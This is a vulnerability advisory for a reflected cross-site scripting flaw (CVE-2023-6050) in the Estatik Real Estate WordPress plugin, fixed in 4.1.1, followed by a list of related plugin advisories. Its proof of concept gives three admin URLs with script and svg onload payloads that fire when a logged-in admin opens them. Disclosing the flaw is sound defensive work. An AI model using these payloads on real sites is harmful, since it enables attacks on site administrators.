Estatik Real Estate Plugin < 4.1.1 – Reflected XSS | CVE 2023-6050 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin):

https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script>

https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby)

https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>

Affects Plugins

Fixed in 4.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

c08e0f24-bd61-4e83-a555-363568cf0e6e

Timeline

Publicly Published

2023-12-25 (about 2 years ago)

Added

2023-12-25 (about 2 years ago)

Last Updated

2023-12-25 (about 2 years ago)

Other

Published

Title

Published

2022-01-18

Title

FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)

Published

2024-12-02

Title

Magical Addons For Elementor < 1.3.7 - Contributor+ Stored XSS

Published

2023-04-17

Title

Japanized For WooCommerce < 2.5.8 - Reflected XSS

Published

2006-09-17

Title

Subscribe to Comments < 2.0.8 - Reflected XSS

Published

2024-08-16

Title

Modal Window < 6.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting